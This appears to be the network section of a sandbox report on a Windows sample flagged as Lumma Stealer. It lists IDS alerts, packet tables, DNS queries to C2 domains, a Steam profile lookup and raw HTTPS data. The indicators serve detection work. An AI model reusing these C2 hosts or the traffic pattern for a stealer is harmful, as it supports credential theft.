2024-12-26T12:45:07.895129+0100	2058492	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)	1	192.168.2.5	52215	1.1.1.1	53	UDP
2024-12-26T12:45:08.042861+0100	2058500	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)	1	192.168.2.5	50742	1.1.1.1	53	UDP
2024-12-26T12:45:08.182814+0100	2058510	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)	1	192.168.2.5	57456	1.1.1.1	53	UDP
2024-12-26T12:45:08.327464+0100	2058484	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)	1	192.168.2.5	59766	1.1.1.1	53	UDP
2024-12-26T12:45:08.511094+0100	2058512	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)	1	192.168.2.5	60516	1.1.1.1	53	UDP
2024-12-26T12:45:08.672427+0100	2058480	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)	1	192.168.2.5	54923	1.1.1.1	53	UDP
2024-12-26T12:45:10.635190+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	23.55.153.106	443	TCP
2024-12-26T12:45:11.455460+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49704	23.55.153.106	443	TCP
2024-12-26T12:45:13.220468+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	172.67.157.254	443	TCP
2024-12-26T12:45:16.034199+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49705	172.67.157.254	443	TCP
2024-12-26T12:45:16.034199+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	172.67.157.254	443	TCP
2024-12-26T12:45:17.364608+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	172.67.157.254	443	TCP
2024-12-26T12:45:37.418008+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49706	172.67.157.254	443	TCP
2024-12-26T12:45:37.418008+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49706	172.67.157.254	443	TCP
2024-12-26T12:45:39.157288+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49743	172.67.157.254	443	TCP
2024-12-26T12:46:07.424139+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49743	172.67.157.254	443	TCP
2024-12-26T12:46:09.245417+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49809	172.67.157.254	443	TCP
2024-12-26T12:46:38.126992+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49809	172.67.157.254	443	TCP
2024-12-26T12:46:39.778813+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49874	172.67.157.254	443	TCP
2024-12-26T12:46:41.837953+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49880	172.67.157.254	443	TCP
2024-12-26T12:46:44.081164+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49886	172.67.157.254	443	TCP
2024-12-26T12:46:45.403758+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49888	172.67.157.254	443	TCP

Network Port Distribution

Total Packets: 103
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:45:09.148437977 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:09.148511887 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:09.148581982 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:09.150068998 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:09.150085926 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:10.635049105 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:10.635190010 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:10.639425039 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:10.639446020 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:10.639700890 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:10.684046984 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:10.731333971 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.455512047 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.455539942 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.455590010 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.455604076 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.455607891 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.455651045 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.455660105 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.455670118 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.455698013 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.455724001 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.649055958 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.649111032 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.649218082 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.649251938 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.649296999 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.680191994 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.680253029 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.680270910 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.680286884 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.680341005 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.733814001 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.733843088 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.733856916 CET	49704	443	192.168.2.5	23.55.153.106
Dec 26, 2024 12:45:11.733864069 CET	443	49704	23.55.153.106	192.168.2.5
Dec 26, 2024 12:45:11.907937050 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:11.907993078 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:11.908098936 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:11.909066916 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:11.909084082 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:13.220282078 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:13.220468044 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:13.223864079 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:13.223875046 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:13.224123001 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:13.225449085 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:13.225476027 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:13.225511074 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:16.034143925 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:16.034229994 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:16.034288883 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:16.035363913 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:16.035387993 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:16.035398960 CET	49705	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:16.035403967 CET	443	49705	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:16.059972048 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:16.060026884 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:16.060126066 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:16.060446978 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:16.060463905 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:17.364464045 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:17.364608049 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:17.365978003 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:17.365989923 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:17.366226912 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:17.367507935 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:17.367541075 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:17.367563963 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.418004036 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.418149948 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.418174982 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.418222904 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.418250084 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.418247938 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.418281078 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.418298006 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.418315887 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.418322086 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.426520109 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.426626921 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.426650047 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.439373970 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.439452887 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.439476967 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.485722065 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.537534952 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.579587936 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.579617023 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.626550913 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.628263950 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.632204056 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.632227898 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.632282972 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.632307053 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.632324934 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.632350922 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.632383108 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.632576942 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.632592916 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.632626057 CET	49706	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.632632017 CET	443	49706	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.849850893 CET	49743	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.849900007 CET	443	49743	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:37.849967003 CET	49743	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.850395918 CET	49743	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:37.850408077 CET	443	49743	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:39.157032013 CET	443	49743	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:39.157288074 CET	49743	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:39.161556959 CET	49743	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:39.161571980 CET	443	49743	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:39.162054062 CET	443	49743	172.67.157.254	192.168.2.5
Dec 26, 2024 12:45:39.171382904 CET	49743	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:39.171526909 CET	49743	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:45:39.171713114 CET	443	49743	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:07.423809052 CET	49743	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:07.644912004 CET	49809	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:07.644954920 CET	443	49809	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:07.645071030 CET	49809	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:07.645473957 CET	49809	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:07.645483971 CET	443	49809	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:09.245291948 CET	443	49809	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:09.245417118 CET	49809	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:09.248130083 CET	49809	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:09.248143911 CET	443	49809	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:09.248437881 CET	443	49809	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:09.250061035 CET	49809	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:09.250368118 CET	49809	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:09.250396967 CET	443	49809	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:09.250451088 CET	49809	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:09.250457048 CET	443	49809	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:38.126638889 CET	49809	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:38.474375010 CET	49874	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:38.474440098 CET	443	49874	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:38.474735975 CET	49874	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:38.475182056 CET	49874	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:38.475198984 CET	443	49874	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:39.778678894 CET	443	49874	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:39.778812885 CET	49874	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:39.780608892 CET	49874	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:39.780642986 CET	443	49874	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:39.780899048 CET	443	49874	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:39.858920097 CET	49874	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:39.859034061 CET	443	49874	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:39.859112978 CET	49874	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:40.486023903 CET	49880	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:40.486076117 CET	443	49880	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:40.486152887 CET	49880	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:40.517421961 CET	49880	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:40.517438889 CET	443	49880	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:41.837852955 CET	443	49880	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:41.837953091 CET	49880	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:41.839963913 CET	49880	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:41.839972019 CET	443	49880	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:41.840261936 CET	443	49880	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:41.841975927 CET	49880	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:41.842017889 CET	443	49880	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:41.842063904 CET	49880	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:42.776834965 CET	49886	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:42.776899099 CET	443	49886	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:42.777033091 CET	49886	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:42.777431011 CET	49886	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:42.777446985 CET	443	49886	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:44.081068039 CET	443	49886	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:44.081163883 CET	49886	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:44.083007097 CET	49886	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:44.083017111 CET	443	49886	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:44.083250999 CET	443	49886	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:44.084486961 CET	49886	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:44.084525108 CET	443	49886	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:44.084577084 CET	49886	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:44.097642899 CET	49888	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:44.097702026 CET	443	49888	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:44.099092960 CET	49888	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:44.099363089 CET	49888	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:44.099381924 CET	443	49888	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:45.403676033 CET	443	49888	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:45.403758049 CET	49888	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:45.405503988 CET	49888	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:45.405514956 CET	443	49888	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:45.405757904 CET	443	49888	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:45.406975031 CET	49888	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:45.407013893 CET	443	49888	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:45.407149076 CET	443	49888	172.67.157.254	192.168.2.5
Dec 26, 2024 12:46:45.407205105 CET	49888	443	192.168.2.5	172.67.157.254
Dec 26, 2024 12:46:45.407221079 CET	49888	443	192.168.2.5	172.67.157.254

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:45:07.457397938 CET	58981	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:07.602500916 CET	53	58981	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:07.607341051 CET	60595	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:07.745450020 CET	53	60595	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:07.748558998 CET	52446	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:07.891181946 CET	53	52446	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:07.895128965 CET	52215	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:08.033308983 CET	53	52215	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:08.042860985 CET	50742	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:08.180594921 CET	53	50742	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:08.182813883 CET	57456	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:08.325007915 CET	53	57456	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:08.327464104 CET	59766	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:08.466439962 CET	53	59766	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:08.511094093 CET	60516	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:08.649118900 CET	53	60516	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:08.672426939 CET	54923	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:08.809952974 CET	53	54923	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:08.903105974 CET	54612	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:09.125432014 CET	53	54612	1.1.1.1	192.168.2.5
Dec 26, 2024 12:45:11.760556936 CET	49280	53	192.168.2.5	1.1.1.1
Dec 26, 2024 12:45:11.901314974 CET	53	49280	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 12:45:07.457397938 CET	192.168.2.5	1.1.1.1	0xa925	Standard query (0)	observerfry.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:07.607341051 CET	192.168.2.5	1.1.1.1	0x33d2	Standard query (0)	wordyfindy.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:07.748558998 CET	192.168.2.5	1.1.1.1	0x5dfe	Standard query (0)	slipperyloo.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:07.895128965 CET	192.168.2.5	1.1.1.1	0x39e0	Standard query (0)	manyrestro.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.042860985 CET	192.168.2.5	1.1.1.1	0x601	Standard query (0)	shapestickyr.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.182813883 CET	192.168.2.5	1.1.1.1	0xf602	Standard query (0)	talkynicer.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.327464104 CET	192.168.2.5	1.1.1.1	0xf85a	Standard query (0)	curverpluch.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.511094093 CET	192.168.2.5	1.1.1.1	0x5f96	Standard query (0)	tentabatte.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.672426939 CET	192.168.2.5	1.1.1.1	0x970e	Standard query (0)	bashfulacid.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.903105974 CET	192.168.2.5	1.1.1.1	0x3a89	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.760556936 CET	192.168.2.5	1.1.1.1	0x9c99	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 12:45:07.602500916 CET	1.1.1.1	192.168.2.5	0xa925	Name error (3)	observerfry.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:07.745450020 CET	1.1.1.1	192.168.2.5	0x33d2	Name error (3)	wordyfindy.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:07.891181946 CET	1.1.1.1	192.168.2.5	0x5dfe	Name error (3)	slipperyloo.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.033308983 CET	1.1.1.1	192.168.2.5	0x39e0	Name error (3)	manyrestro.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.180594921 CET	1.1.1.1	192.168.2.5	0x601	Name error (3)	shapestickyr.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.325007915 CET	1.1.1.1	192.168.2.5	0xf602	Name error (3)	talkynicer.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.466439962 CET	1.1.1.1	192.168.2.5	0xf85a	Name error (3)	curverpluch.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.649118900 CET	1.1.1.1	192.168.2.5	0x5f96	Name error (3)	tentabatte.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:08.809952974 CET	1.1.1.1	192.168.2.5	0x970e	Name error (3)	bashfulacid.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:09.125432014 CET	1.1.1.1	192.168.2.5	0x3a89	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.901314974 CET	1.1.1.1	192.168.2.5	0x9c99	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.901314974 CET	1.1.1.1	192.168.2.5	0x9c99	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	23.55.153.106	443	3500	C:\Users\user\Desktop\6GNqkkKY0j.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:45:10 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-26 11:45:11 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Dec 2024 11:45:11 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=5d7ce44dc46ee3ea4d9974a9; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-26 11:45:11 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
